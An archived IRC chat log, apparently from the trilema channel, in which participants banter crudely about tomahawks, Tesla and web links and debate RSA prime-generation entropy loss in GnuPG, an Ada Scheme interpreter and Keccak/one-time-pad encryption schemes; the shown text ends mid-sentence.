1737113;1510534709;mats;i've heard a number of stories with folks using pointy end of empty rifle to strike dwelling inhabitants during breach&clear, jokesters bringing hatchets, axes, machetes for MOUT, etc 1737114;1510534779;mats;tomahawks are a perennial favorite 1737115;1510534898;mats;https://www.adventuresurvivalequipment.com/vtac-lagana-tactical-tomahawk.html has an NSN for ez purchasing 1737116;1510534959;asciilifeform;lol $ 120 axe 1737117;1510534962;asciilifeform;with plastic shaft 1737118;1510534970;mats;military-grade! 1737119;1510534975;mircea_popescu;nuts 1737120;1510534976;asciilifeform;living stereotype 1737121;1510534982;asciilifeform;on top of this, 'out of stock !' 1737122;1510534984;mircea_popescu;how come everything these people do is wankery "with a nsn" 1737123;1510535002;asciilifeform;mircea_popescu: if it has no 'supply code' , 10x the paperwork to buy 1737124;1510535012;mircea_popescu;i think this is my point. 1737125;1510535040;asciilifeform;( incl. people. e.g. http://btcbase.org/log/2017-01-27#1608864 ) 1737126;1510535040;a111;Logged on 2017-01-27 23:36 asciilifeform: (i was once, and i shit thee not, 'research chemist'. not because knew any chemistry, but because there was -- i shit thee not -- no box to 'tick' in the form, for 'programmer') 1737127;1510535463;asciilifeform;upstack lulz, https://justshoot.me >> 'MICHAEL LEWIS GLOVER | FINE ART PHOTOGRAPHY' 1737128;1510539901;*;BingoBoingo back from ferrying a little miss trainwreck around. 1737129;1510539904;BingoBoingo;!~step12 1737130;1510539904;jhvh1;12. Having had a spiritual awakening as the result of these steps, we tried to carry this message to alcoholics, and to practice these principles in all our affairs. 1737131;1510540009;asciilifeform;say moar, BingoBoingo 1737132;1510540342;BingoBoingo;asciilifeform: I've been ferrying a miss trainwreck around as favor to her sponsor. Very entertaining ordeal. 1737133;1510540731;mircea_popescu;whoa earthquake 1737134;1510540741;mircea_popescu;big enough to drop pots off shelves and shit 1737135;1510540780;mircea_popescu;whoa. 7.0 in jaco! 1737136;1510540782;BingoBoingo;Cool 1737137;1510540846;BingoBoingo;asciilifeform: What more is there to say, Spent good chunk of the day learning from the weapon of mass destruction in my passenger seat. 1737138;1510546832;BingoBoingo;In other mine chaff: "What the fuck… that is the most messed up thing I ever read. I am not European just because I have white skin, you sicko. I do not relate to the experiences of white people, why would I identify with them? You probably have an inferiority complex and feel the need to pretend you’re white because you hate yourself." 1737139;1510547715;BingoBoingo;And in Returning Kink Studies http://www.returnofkings.com/132612/why-i-ate-my-pet-pig-and-you-should-too 1737140;1510547765;BingoBoingo;"Instead of fetching your slippers they’ll shit on them without remorse, as if keenly aware that ruining your property would be insulting to you. Instead of sleeping next to you, ready, and waiting in guard position, they will find a comfy spot squarely on your forehead, burrow down and screech to high heaven if you motion to remove them. Rinse and repeat they will, despite many deserved beatings. Brats." 1737141;1510548376;mats;in more excerpts, https://forums.tesla.com/en_AU/node/89647 1737142;1510548387;mats;"And we are pushing robots to the limit in terms of the speed that they can operate at, and asking our suppliers to make robots go way faster, and they are shocked because nobody has ever asked them that question. It's like if you can see the robot move, it's too slow. We should be caring about air friction like things moving so fast. You should need a strobe light to see it. And that's incredibly critical to CapEx 1737143;1510548387;mats;efficiency." 1737144;1510548461;mats;wat. 1737145;1510548475;mats;(elon musk) 1737146;1510548632;BingoBoingo;I thought needing a strobe light to see was something young boys learned escaping Kevin Spacey's basement 1737147;1510549238;asciilifeform;http://btcbase.org/log/2017-11-13#1737142 << i gotta bite this bait: 1737148;1510549238;a111;Logged on 2017-11-13 04:46 mats: "And we are pushing robots to the limit in terms of the speed that they can operate at, and asking our suppliers to make robots go way faster, and they are shocked because nobody has ever asked them that question. It's like if you can see the robot move, it's too slow. We should be caring about air friction like things moving so fast. You should need a strobe light to see it. And that's incredibly critical to CapEx 1737149;1510549361;asciilifeform;the 'tecan evo' i worked with ( small industrial gantry bot ) could make fully 100x faster motions than vendor recommended . BUT -- 1) the default winblowz turdware ( that afaik every installation other than mine, used , lock stock etc ) would result eventually in smashed equipment, dead bearings, and possibly injured meat and .. 1737150;1510549367;asciilifeform;2) vibration 1737151;1510549439;asciilifeform;just because thing can 'move faster than you can see' dun mean that it stops on a dime, or that it won't oscillate ( ever see rifle barrel on high speed camera? ) , ring like a bell, destroy whatever illusion of accuracy. 1737152;1510549541;asciilifeform;this is an entire field, i cannot begin to sum it up here. but even in 19th c machinists understood 'fast cut xor accurate cut' 1737153;1510549641;asciilifeform;as for 'critical to capex', vey rarely is robot the chokepoint in the line. 1737154;1510549724;asciilifeform;if actually care about capex -- speed up, or better yet, eliminate -- the ~meat~ in your line. 1737155;1510549774;BingoBoingo;Or parallelize lines 1737156;1510549797;BingoBoingo;If Hu cares to 1737157;1510549821;asciilifeform;'tesla' of course is not a commercial op in the usual sense, but rather an elaborate fraud prop, similar to a konsoomer-flavoured lockheedmartin 1737158;1510549837;asciilifeform;for milking usg 1737159;1510549891;asciilifeform;so it is quite in keeping with this, for it to , say, pioneer 'robot works in vacuum, and moves without hindrance of air resistance, ReallyFast!' etc 1737160;1510552018;ag3nt_zer0;pete_dushenski http://www.contravex.com/2017/11/12/bigs-vancouver-house-the-last-pied-a-terre-youll-ever-need/#identifier_6_19987 <<< thanks for the introduction to Ingels. My family is from a small town near Wright's Taliesin and a good old family friend of mine owned a classic FLW student-designed house that sat on 40 acres above Lake Wisconsin - I practically lived in that house for 3 seasons one year and there is really nothin 1737161;1510552047;ag3nt_zer0;it was stylistically almost a copy of the first slide here: http://www.theadanews.com/news/local_news/a-visit-to-taliesin-frank-lloyd-wright-s-wisconsin-estate/article_eea7de5b-a7a0-5678-8035-01af370b94a3.html 1737162;1510552186;ag3nt_zer0;Never been in a place that has equaled that in regards to my definition of a warm home... looking forward to learning more of Ingels 1737163;1510553598;BingoBoingo;http://oglaf.com/allconsuminganus/ 1737164;1510554127;BingoBoingo;http://oglaf.com/godoflies/ 1737165;1510568670;mircea_popescu;aaand in other lulz, http://bitcoin3x.org/ 1737166;1510573141;mircea_popescu;in other news : it was established in teh minigame torture rooms that in point of fact 4096 bit keys contain only 4090 bits of entropy at the very most (minus whatever koch-gpg manages to shave off in other ways). 1737167;1510573196;mircea_popescu;the reason is that (in a translation of what koch-gpg does into sanity) you take 2045 bits of rng for each possible prime, stick 11 in front and 1 in the tail and THAT is your 2048 bit prime candidate. 1737168;1510573223;mircea_popescu;the reason you stick the 1 in the tail is to ensure odd numbers -- large even numbers are never prime. this much is a math-forced reduction. 1737169;1510573252;mircea_popescu;the reason you stick the first 1 in the front is, evidently, to not end up with sub-4096 Ns 1737170;1510573326;mircea_popescu;the reason you stick the 2nd 1 in front is, not evidently, also to not end up with sub-4096 Ns : if you had the exceptional case of your primes being each 2^2047 + 1 your N would then be 2^4094+2^2048+1, which is shorter than 4096 bits. 1737171;1510573406;mircea_popescu;this is evidently a "loss" of entropy, in the sense that what is advertised (4096) differs from what is actually delivered (no more than 4090). i am of a good mind to start calling them 4090 bit keys tbh. 1737172;1510573599;diana_coman;p and q are different so there won't be exactly this limit case there, but obv same 4095 bits n instead of 4096 for other low-enough odd numbers that might be primes 1737173;1510573632;mircea_popescu;diana_coman never, because 11 * 11 = 1001. 1737174;1510574262;mircea_popescu;and in other emergencies / what is yahoo good for ? https://www.yahoo.com/news/police-suspects-overwhelming-gas-shuts-down-interrogation-153853856.html 1737175;1510576600;mircea_popescu;anyway, back to rsa discussion : there's about 6.5e612 primes in the interval 2^2045-1, 0 (by teh prime number theorem). every key needs a pair of these, and no number can EVER be repeated (if it is -- phuctor breaks both keys). 1737176;1510576901;mircea_popescu;the chances of such repeating happening naturally'd be ~the inverse of ∏(1 - 2i/6.5e612), 1 in other news : it was established in teh minigame torture rooms that in point of fact 4096 bit keys contain only 4090 bits of entropy at the very most (minus whatever koch-gpg manages to shave off in other ways). << uugh. every time we peel a layer back... 1737186;1510582993;asciilifeform;http://btcbase.org/log/2017-11-13#1737169 << iirc we had a thread , re this spectacular lul 1737187;1510582993;a111;Logged on 2017-11-13 11:40 mircea_popescu: the reason you stick the first 1 in the front is, evidently, to not end up with sub-4096 Ns 1737188;1510583044;asciilifeform;( picture extending this by induction : 'why not glue another 1 after that 1 , lest we end up with sub-4095...' ) 1737189;1510583123;asciilifeform;http://btcbase.org/log/2017-11-13#1737171 << the only properly forced loss is of the bottom bit 1737190;1510583123;a111;Logged on 2017-11-13 11:43 mircea_popescu: this is evidently a "loss" of entropy, in the sense that what is advertised (4096) differs from what is actually delivered (no more than 4090). i am of a good mind to start calling them 4090 bit keys tbh. 1737191;1510583316;asciilifeform;http://btcbase.org/log/2017-11-13#1737177 << nobody's ever running out of these 1737192;1510583316;a111;Logged on 2017-11-13 12:44 mircea_popescu: this is not "true for very many keys like a billion trillion keys". this is true all the way up, by the time one's made 10^609 keys we're starting to get into five-nines assurance of unicity. 1737193;1510584068;asciilifeform;in other lulz, https://seekingalpha.com/article/4122890-tesla-approaches-terminal-decline 1737194;1510584105;asciilifeform;'Tesla’s CEO seems to be fully unaware of why industrial robots have limits, affecting actuators, speed and precision when handling heavy parts reliably and minimal downtime. Air friction is certainly no constraint, but moments, acceleration and deceleration. ' 1737195;1510584149;asciilifeform;( in re yesterday's thread where http://btcbase.org/log/2017-11-13#1737159 ) 1737196;1510584149;a111;Logged on 2017-11-13 05:11 asciilifeform: so it is quite in keeping with this, for it to , say, pioneer 'robot works in vacuum, and moves without hindrance of air resistance, ReallyFast!' etc 1737197;1510584820;asciilifeform;re the rsa key entropy, it is possible to trivially regain the lost bottom bits' worth of entropy -- you save the discarded bits and use them later as triggers for 'take nextprime(p) instead of p' and 'take nextprime(q) instead of q' . there may be other possible algos 1737198;1510584847;asciilifeform;thinkaboutit. 1737199;1510584943;asciilifeform;as i see it, this circle is satisfactorily squared nao. 1737200;1510585302;mod6;im not sure about that 1737201;1510585400;mod6;even /if/ doing some prime selection based on 'discarded bits' would net you anything what-so-ever, is it shown, presently that they even do this? 1737202;1510585692;asciilifeform;mod6: noshit koch doesn't do this 1737203;1510585770;asciilifeform;but you can trivially show that using the bottom bits in this way lets you actually get 4x as many possible primes 1737204;1510585899;asciilifeform;nao ideally one would have a http://btcbase.org/log/2017-11-07#1733382 i.e. 4096b of ~possible prime~ phase space 1737205;1510585899;a111;Logged on 2017-11-07 16:36 asciilifeform: let's model the ideal prime-shitter. it would be an item that takes integer N , of whatever bitness, and produce the Nth prime ( or eggog if the Nth prime is bigger than the register bitness permitted. ) 1737206;1510585908;asciilifeform;but nobody's gonna. 1737207;1510585944;asciilifeform;( it's a 3000yr unsolved megaproblem ) 1737208;1510586054;asciilifeform;tho here's a somewhat barbaric method : 1737209;1510586130;asciilifeform;1) calculate what a certain b is, such that there are likely to be 2^4096 primes below 2^b-1 1737210;1510586179;asciilifeform;2) generate a random k, k < 2^b 1737211;1510586199;asciilifeform;3) if composite(k) goto 2 1737212;1510586221;asciilifeform;4) if log2(k) > 4096 goto 2 1737213;1510586246;asciilifeform;5) you have a winner: a prime selected from 2^4096 possibles. 1737214;1510586276;mod6;i must be missing something 1737215;1510586281;asciilifeform;hm? 1737216;1510586321;asciilifeform;actually yer not missing anything, above algo is an absurdity 1737217;1510586358;asciilifeform;it will do exactly same thing as traditional one, but take 1000x as long. 1737218;1510586367;mod6;when you say 'lost bottom bits' worth of entropy -- you save the discarded bits and use them later', are you talking about the highest order 2 digits, and the lowest 1, saving their original lower-order half and using that? 1737219;1510586377;asciilifeform;lowest 1737220;1510586398;asciilifeform;they are the only ones you MUST set to 1 (i.e. lose the entropy of) 1737221;1510586407;asciilifeform;because you gotta have odd p and q 1737222;1510586444;asciilifeform;the shaving of the ~highest~ bits is an idiot kochism on the other hand, 1737223;1510586456;asciilifeform;there is no legitimate reason to do it. 1737224;1510586472;mod6;yeah, /me re-read and Mr. P. said they discard the higest 2 digits 1737225;1510586481;asciilifeform;aha, koch does 1737226;1510586513;mod6;so in your algo above, you're saying that you can work that magic with just the ~lowest~ discarded digit 1737227;1510586532;asciilifeform;ignore the 5step thing 1737228;1510586571;asciilifeform;but yes you can use each of the 2 discarded bottom bits to double the primespace available 1737229;1510586617;mod6;sorry if this is obvious, wasn't to me. 1737230;1510586638;asciilifeform;( 1 caveat is that this is a leaking operation , theoretically ) 1737231;1510586655;*;asciilifeform bbl, teatime 1737232;1510591214;BingoBoingo;!~ticker --market all 1737233;1510591221;jhvh1;BingoBoingo: Bitstamp BTCUSD last: 6539.77, vol: 28531.98250185 | Bitfinex BTCUSD last: 6455.9, vol: 117240.23947972 | Kraken BTCUSD last: 6558.2, vol: 8497.52824841 | Volume-weighted last average: 6477.04655989 1737234;1510591230;BingoBoingo;OMG Re-Crashing! 1737235;1510591411;trinque;surely the tickerbot has been switched to bitcoin crash? what do I make of this? 1737236;1510591698;BingoBoingo;Pie? Caek? Lemoncaek? 1737237;1510591726;BingoBoingo;If making pies, you have to make the best, and best means round. 1737238;1510591878;lobbes;Good news on archive front; archive.is d00d has agreed to add my ips to his cloudflare whitelist 1737239;1510592323;trinque;nice lobbes. this means you'll not be ratelimited? or what was the problem? 1737240;1510592654;lobbes;trinque, yeah. Hopefully will be able to bypass the cloudflare js/cookie challenge wall 1737241;1510592668;lobbes;Very accommodating d00d indeed. I invited him here, as well, but you know how that goes 1737242;1510595054;ben_vulpes;http://btcbase.org/log/2017-11-12#1736892 << some years ago, several people got together and worked through 'an incremental approach to compiler construction', one nick fitzgerald worked through it in ada: https://github.com/fitzgen/ada-scheme 1737243;1510595054;a111;Logged on 2017-11-12 23:39 mircea_popescu: does an ada lisp ~even exist~ as far as anyone knows ? 1737244;1510595204;*;ben_vulpes made some headway through lisp in small pieces, mind appropriately blown 1737245;1510595268;ben_vulpes;and in ancients, dusted off mpfhf benchmarker, finished the bit-banging of inputs, fired off a run late last week that is *still hashing* 1737246;1510595564;trinque;"bitch, this hash function is hard in *both* directions!" 1737247;1510596813;asciilifeform;use Ada.Strings.Unbounded; << mno ben_vulpes this is ~specifically~ a Do Not Want 1737248;1510596841;asciilifeform;( it uses implicit heaptronics for everything ) 1737249;1510596846;ben_vulpes;suresure 1737250;1510597259;asciilifeform;http://btcbase.org/log/2017-11-13#1737238 << this is very neat 1737251;1510597259;a111;Logged on 2017-11-13 16:51 lobbes: Good news on archive front; archive.is d00d has agreed to add my ips to his cloudflare whitelist 1737252;1510597274;asciilifeform;lobbes: does this mean that you can mirror the whole zip collection nao ? 1737253;1510597937;BingoBoingo;lobbes: So modest is becoming less modest? 1737254;1510598211;asciilifeform;http://btcbase.org/log/2017-11-13#1737245 << if you apply the bound we found in http://btcbase.org/log/2017-07-06#1679483 thread, and the http://btcbase.org/log/2017-08-15#1698509 trick, mphf a not-especially-slow hash 1737255;1510598211;a111;Logged on 2017-11-13 17:47 ben_vulpes: and in ancients, dusted off mpfhf benchmarker, finished the bit-banging of inputs, fired off a run late last week that is *still hashing* 1737256;1510598211;a111;Logged on 2017-07-06 00:26 asciilifeform: S grows by 1 or 0 bits per cycle. 1737257;1510598211;a111;Logged on 2017-08-15 22:51 asciilifeform: but instead flipping a single bit that gets xored with the result every time you read from the would-have-been-flipped reg. 1737258;1510598241;asciilifeform;though asciilifeform will admit to still being at a loss re what the appeal is , after these... 1737259;1510598344;asciilifeform;but if you want to make a fast mphftron, for experimentation, the recipe is 1) compute upper bound of the scratch space length and preallocate. NEVER realloc 2) NEVER flip-all-the-bits, flip a 'did-we-flip' bit instead, and the latter always get xor'd with whatever bit you read from the flippablespace. 1737260;1510599348;ben_vulpes;asciilifeform: absolutely, have a benchmarking in place, will be implementing those two changes and recording improvements 1737261;1510599614;asciilifeform;also you don't want to cons. at. all. 1737262;1510601372;phf;http://btcbase.org/log/2017-11-13#1737247 << it looks like a properly structured scheme evaluator, but it's ~explicitly~ lacking a native cons, which might be a very good exercise for whoever™ adding a static allocation space, adding mark-and-sweep, then all those To_Unbounded_String look like they can be simply search/replaced 1737263;1510601372;a111;Logged on 2017-11-13 18:13 asciilifeform: use Ada.Strings.Unbounded; << mno ben_vulpes this is ~specifically~ a Do Not Want 1737264;1510601713;asciilifeform;phf: ideally i'd get rid of Ada.Strings , full stop 1737265;1510601767;phf;well, right. i'm not sure what ada.strings is (i.e. is it a protocol or concrete datatype), so i can't really comment further 1737266;1510601768;asciilifeform;and rewrite the parser per se in scheme ( have it be present as commented bytecode constant ) 1737267;1510601814;phf;there be dragons. i mean, if you're rewriting a parser in lisp, then you might as well have proper readtables, rather then hardcoded sexp hack 1737268;1510601819;asciilifeform;and get rid of the pointers. 1737269;1510601883;asciilifeform;( there's no particular reason why you can't have a schemetron use strictly arrays and integer indices into same ) 1737270;1510601887;phf;i'm not sure how you're planning on doing that, unless you mean ada level pointers. you'd have to have objects with values that are offsets into your virtual heap 1737271;1510601894;phf;ah, k 1737272;1510601901;asciilifeform;indices. as seen in ffa. 1737273;1510601926;asciilifeform;( the operative difference is that indices are bounded , and you can reason meaningfully about'em ) 1737274;1510601951;phf;right, i suspect that scheme.adb doesn't touch on it, because, again, no cons 1737275;1510601994;asciilifeform;https://github.com/fitzgen/ada-scheme/blob/master/scheme.adb#L134 << the faux cons. observe, they use pointers for the car/cdr 1737276;1510602004;asciilifeform;whole thing reads like straight translation from c 1737277;1510602007;phf;somewhat relatedly one handy thing i saw on CADR is named cons regions, i.e. explicit memory regions where you can cons and every allocation function having a *-in-region equivalent, like (cons-in-region x y region). i'm not sure if that's there, but you presumably can do some kind (with-cons-region (region ...) body) thing. naturally those regions can be saved (preserved referential integrity) or cleared, etc. 1737278;1510602084;phf;the array instead of pointers approach gives you free save (in fact you can run it against a mmaped region and have a ghetto core file) 1737279;1510602136;asciilifeform;( see also , http://btcbase.org/log/2017-07-13#1682511 ) 1737280;1510602136;a111;Logged on 2017-07-13 15:42 asciilifeform: phf: contrary to appearances, asciilifeform is not fixated on ada lang per se, but rather on the style of thinking it leads the operator into. 1737281;1510602170;asciilifeform;phf: you can run your entire heap of a mmap'd region , neh 1737282;1510602175;asciilifeform;*off 1737283;1510602178;phf;that's what i said. 1737284;1510602190;asciilifeform;no particular reason why it needs custom 'regions' support 1737285;1510602197;phf;it's unrelated 1737286;1510602201;asciilifeform;( though they are useful for cache locality ) 1737287;1510602253;phf;asciilifeform: i'm using "memory management" meaning of cons, not like lisp 101 take on it. they don't have cons meaning that there's no managed heap, there's no gc on that heap, and you can't allocate things into the heap and let it be managed by heap machinery. so they have "cons", but their ~actual~ cons is ada's "new ..." 1737288;1510602264;asciilifeform;aa 1737289;1510602270;asciilifeform;right 1737290;1510602330;asciilifeform;( there is however the http://btcbase.org/log/2017-11-12#1736844 pov ) 1737291;1510602330;a111;Logged on 2017-11-12 23:12 asciilifeform: i'm not fully convinced that a scripting lang ~needs~ a gc 1737292;1510602397;phf;like in php model? allocate as much as you want and then "free" on termination? 1737293;1510602406;asciilifeform;aha. free with death. 1737294;1510602430;asciilifeform;and not 'as much as you want' but up to B bytes, with B given on commandline and stackframed on warmup. 1737295;1510602438;phf;right, maxheap 1737296;1510602513;asciilifeform;to put it in libctronic terms, the resulting linux binary will call setbrk() ~exactly once~ in its life 1737297;1510602613;phf;right, so that scheme.adb would benefit from a way to cons onto an arbitrary sized array, and then later someone can bolt a gc on top of that. can even implement it as an explicit function call rather than a threshold thing 1737298;1510602635;asciilifeform;imho it dun particularly make sense to have gc in this application 1737299;1510602640;asciilifeform;but i already described why. 1737300;1510602758;phf;well, i'm thinking in terms of a TMSR MACHINE. scheme.adb linked against ffa linked against that com1 hack you posted some time ago :p 1737301;1510602815;asciilifeform;if 'machine' i'd rather have handwritten 32kb asm thing, than whatever 'best effort' gcc shits out. 1737302;1510602834;asciilifeform;but sure. 1737303;1510604925;asciilifeform;meanwhile, in world of ancient fpga, http://www.geekdot.com/category/hardware/transputer/avm-b1 . 1737304;1510605335;diana_coman;I can't seem to find in the logs any discussion re duplex construction/duplexing the sponge i.e. keccak's authors own proposal of using keccak for authenticated encryption; did anyone look into this? 1737305;1510605353;asciilifeform;diana_coman: iirc it was in the original paper 1737306;1510605385;asciilifeform;keccak is immune to length-extension attack so it is pretty straightforward to convert it into a cipher 1737307;1510605386;diana_coman;well, I have several papers on keccak and one of them is this "Duplexing the sponge: single-pass authenticated encryption and other applications" 1737308;1510605421;diana_coman;however so far I focused on the reference paper on keccak itself (The Keccak reference version 3.0) 1737309;1510605472;asciilifeform;diana_coman: what are you contemplating making ? 1737310;1510605521;diana_coman;asciilifeform, I'm still looking/exploring potential solutions for client-server communication needs in eulora 1737311;1510605534;asciilifeform;well yes but moar specifically 1737312;1510605571;asciilifeform;iirc you were gonna use mircea_popescu's algo ( use rsa to send otp pages, then later use'em ) 1737313;1510605594;diana_coman;asciilifeform, the second part is not so well defined/fixed yet 1737314;1510605621;asciilifeform;what's hard re using otp ? it's a xor 1737315;1510605754;diana_coman;yes; but it's unclear if a simple bitfield xor is best option 1737316;1510605800;asciilifeform;for so long as you're actually using otp (i.e. 1 byte of key used for exactly 1 byte of payload) it's the only logical option 1737317;1510606391;diana_coman;I meant the choice of specific, concrete way to expand the original bitfield i.e. "reuse the otp" 1737318;1510606424;asciilifeform;how atrociously slow does the 'never reuse' variant look ? 1737319;1510606475;asciilifeform;if you use actual one-time -- you then dun have to reinvent symmetric ciphering 1737320;1510606622;diana_coman;heh, true that; I think first trouble there is that "never-reuse" choice means "no-knob" for client who pays however for the traffic; the whole point was precisely to let player choose their own level of compromise between cost and security (otps are generated on the server for good reason) 1737321;1510606652;asciilifeform;the boojum is that neither i nor anybody else knows of any rational way to quantify the compromise. 1737322;1510606665;asciilifeform;( we dun have a scientific approach to symmetric ciphering. ) 1737323;1510606696;diana_coman;yees, but conceivably there might be one in the future; if no knob then no point as it were, entirely 1737324;1510606736;asciilifeform;tbh i dun expect to live to see such a thing 1737325;1510606897;diana_coman;asciilifeform, re mp's algo, it was this: http://btcbase.org/log/2017-10-06#1722036 1737326;1510606897;a111;Logged on 2017-10-06 23:13 mircea_popescu: basically the scheme is, you rsa a random bitfield, then you expand that into as much otp as you want by doing recursively Fi = hash(bitfield + Fi-1). there's a limit on i, obviously, which can be set to 1. 1737327;1510606911;asciilifeform;aaa 1737328;1510606921;asciilifeform;yea that's hash-as-blockcipher 1737329;1510606927;asciilifeform;makes sense then 1737330;1510607073;diana_coman;at a first pass this duplex thing based on keccak seems to be a similar attempt really, hence my question if anyone looked at it more closely (I'm still trying to fully grasp it, not there yet) 1737331;1510607202;asciilifeform;as i understand, ordinary keccak suffices for this scheme 1737332;1510607366;BingoBoingo;!~ticker --market all 1737333;1510607372;jhvh1;BingoBoingo: Bitstamp BTCUSD last: 6545.26, vol: 30220.26606995 | Bitfinex BTCUSD last: 6413.3, vol: 121231.82335321 | Kraken BTCUSD last: 6564.5, vol: 8688.60323938 | Volume-weighted last average: 6446.40578362 1737334;1510607416;asciilifeform;^ pheeature idea : why not have ticker autofire when the number moves >10% from last tick 1737335;1510613186;asciilifeform;meanwhile, in very vintage lulz, https://archive.is/I5JC0 >> 'Secretary of State Baker said Washington would not object to military intervention in Romania by Soviets or the Warsaw Pact.' 1737336;1510616192;asciilifeform;https://archive.is/Gr8Rf << in other agitprop. 1737337;1510616294;asciilifeform;'The Chinese miners were instructed to continue mining the coin, even at great financial loss, to support a pretension of value and use, minimally sustaining its life. When the price troughed, those who were in the know about the plan accumulated it in large quantities' etc. 1737338;1510619924;BingoBoingo;!~later tell mircea_popescu http://wotpaste.cascadianhacker.com/pastes/iJ8bz/?raw=true 1737339;1510619924;jhvh1;BingoBoingo: The operation succeeded. 1737340;1510620917;mircea_popescu;http://btcbase.org/log/2017-11-13#1737193 << in no sense more terminal than say apple. 1737341;1510620917;a111;Logged on 2017-11-13 14:41 asciilifeform: in other lulz, https://seekingalpha.com/article/4122890-tesla-approaches-terminal-decline 1737342;1510620933;asciilifeform;exactly same item 1737343;1510620947;mircea_popescu;right. "has cash" usg printed for it. 1737344;1510620964;asciilifeform;moar spectacular tho, candle burns at both ends 1737345;1510620966;mircea_popescu;but for the nitpick : it's not the job of the ceo to know why robots have limits. 1737346;1510620974;asciilifeform;it is if he opens mouth re robots 1737347;1510620977;mircea_popescu;this totally orc bullshit where everyone is an expert in everyone's field already... 1737348;1510620990;mircea_popescu;asciilifeform ceo is an operational management position. 1737349;1510621021;mircea_popescu;cto's job is to understand why robots have limits, if the company is doing robots. 1737350;1510621044;asciilifeform;gensec is also managerial position. hruschev and his corn speeches remain lulzy. 1737351;1510621077;asciilifeform;fella oughta chat with his cto, vizier, etc before becoming a public clown. 1737352;1510621108;mircea_popescu;indeed. but here's the hidden truth : the idiots TALKING TO HIM about it are no different from the people asking beautician re politics. 1737353;1510621125;mircea_popescu;ie, he's an idiot for answering, but someone somewhere was an idiot for asking. 1737354;1510621135;asciilifeform;these are always on hand 1737355;1510621149;mircea_popescu;THAT someone isn't admitting to idiocy, preferring isntead to derp about how "Ceo is supposed to know all". 1737356;1510621179;mircea_popescu;if it were workable for ceo to know all why would corporations even be needed in first place ? 1737357;1510621295;mircea_popescu;http://btcbase.org/log/2017-11-13#1737203 << i'm happier with properly reporting keys as 4090 bits, and pointedly explaining WHY the difference to the user. 1737358;1510621295;a111;Logged on 2017-11-13 15:09 asciilifeform: but you can trivially show that using the bottom bits in this way lets you actually get 4x as many possible primes 1737359;1510621299;mircea_popescu;politically preferable. 1737360;1510621336;mircea_popescu;im not going to have my tech people do backflips to seamlessly bridge imperial idiocy into reality when i could just have the marketing people point out to how the empire lied by making the difference a point of difference. 1737361;1510621351;asciilifeform;mircea_popescu: i made a stab of computing a lower bound of bitness for hypothetical '4096b of possible prime' but ran out of juice. 1737362;1510621359;mircea_popescu;waste of juice. 1737363;1510621409;asciilifeform;it's an answerable question, euler could have made short work of it 1737364;1510621424;mircea_popescu;euler is dead. 1737365;1510621469;mircea_popescu;http://btcbase.org/log/2017-11-13#1737223 << so what, have 0-led p, q ? what are you on aboot. 1737366;1510621469;a111;Logged on 2017-11-13 15:20 asciilifeform: there is no legitimate reason to do it. 1737367;1510621503;asciilifeform;mircea_popescu: the only case where this is a problem is 0-led p + 0-led q 1737368;1510621506;mircea_popescu;http://btcbase.org/log/2017-11-13#1737238 << win. 1737369;1510621506;a111;Logged on 2017-11-13 16:51 lobbes: Good news on archive front; archive.is d00d has agreed to add my ips to his cloudflare whitelist 1737370;1510621514;asciilifeform;if only 1 -- then high bits of p,q remain seekrit 1737371;1510621523;mircea_popescu;asciilifeform 0 led either one, or rather, non 11 led either one gives you a sub 4096 N 1737372;1510621556;asciilifeform;hmm 1737373;1510621570;mircea_popescu;http://btcbase.org/log/2017-11-13#1737241 << tell him that if he regs a name ima donate to his project. 1737374;1510621570;a111;Logged on 2017-11-13 17:04 lobbes: Very accommodating d00d indeed. I invited him here, as well, but you know how that goes 1737375;1510621587;asciilifeform;i can actually see the 1. but why 11 1737376;1510621599;mircea_popescu;asciilifeform there's nothing in principle wrong with the 2045 bit primes, except, of couyrse, the lying about it. 1737377;1510621604;mircea_popescu;plenty of entropy left as it is. 1737378;1510621611;asciilifeform;( and why not then 111, 1111.... ) 1737379;1510621628;mircea_popescu;asciilifeform 11 x 11 = 1001 ; 10 x 10 = 0100 1737380;1510621639;mircea_popescu;you need two bits to make 4, not 3. that's it. 1737381;1510621658;mircea_popescu;111 doesn't add anything, 111 x 111 = 110001 ie 6 1737382;1510621671;asciilifeform;you don't actually get a 10x10=0100 because carry bits ripple up 1737383;1510621691;asciilifeform;(last digit of a product is not a straight product of the last-digit-of-p and last-digit-of-q ) 1737384;1510621727;asciilifeform;( by 'last' here is meant, of course, leftmost ) 1737385;1510621739;mircea_popescu;101111 x 101111 = 100010100001, if you're lucky ; but 100000 x 101111 = 010111100000 which is no good. 1737386;1510621756;mircea_popescu;asciilifeform we're discussing first digits not last digits here. 1737387;1510621784;asciilifeform;the way i'd implement the whole shebang, is simply to reject both primes if the highest bit of pq is not 1 . 1737388;1510621789;asciilifeform;rinse, repeat. 1737389;1510621794;asciilifeform;no reason to lose that 1bit of entropy. 1737390;1510621807;mircea_popescu;you lose it by this impl as well. 1737391;1510621818;mircea_popescu;as you'll reject the primes and end up with the same 2045 bits of entropy 1737392;1510621819;asciilifeform;you lose 1. but in koch's variant you lose 2 . 1737393;1510621823;asciilifeform;( plus the 2 bottoms ) 1737394;1510621825;asciilifeform;4 all in all 1737395;1510621851;mircea_popescu;ok, you'd conceivably squeeze a little more, but again, see http://btcbase.org/log/2017-11-14#1737360 1737396;1510621851;a111;Logged on 2017-11-14 01:02 mircea_popescu: im not going to have my tech people do backflips to seamlessly bridge imperial idiocy into reality when i could just have the marketing people point out to how the empire lied by making the difference a point of difference. 1737397;1510621860;asciilifeform;at any rate i haven't any argument against http://btcbase.org/log/2017-11-14#1737376 1737398;1510621860;a111;Logged on 2017-11-14 01:06 mircea_popescu: asciilifeform there's nothing in principle wrong with the 2045 bit primes, except, of couyrse, the lying about it. 1737399;1510621870;mircea_popescu;clarity is more valuable than a nearer asimptote, in many contexts. 1737400;1510621877;asciilifeform;honestly labeled box imho suffices. 1737401;1510621880;mircea_popescu;quite. 1737402;1510621914;mircea_popescu;it's still an unreturned function "what other bits are lost what other places". so this 4090 still an upper bound. 1737403;1510621924;mircea_popescu;but... working on. 1737404;1510621948;asciilifeform;afaik diana_coman exhaustively showed the places 1737405;1510621952;mircea_popescu;http://btcbase.org/log/2017-11-13#1737245 < ha! 1737406;1510621952;a111;Logged on 2017-11-13 17:47 ben_vulpes: and in ancients, dusted off mpfhf benchmarker, finished the bit-banging of inputs, fired off a run late last week that is *still hashing* 1737407;1510621964;mircea_popescu;asciilifeform quintuplechecking never hurt anything. 1737408;1510621996;asciilifeform;( she is using my sanitized gpg bignum. but i did not preserve koch's faux-rng atrocity ; so anything pertaining to entropy, is new ) 1737409;1510622003;asciilifeform;iirc she is pumping it straight from 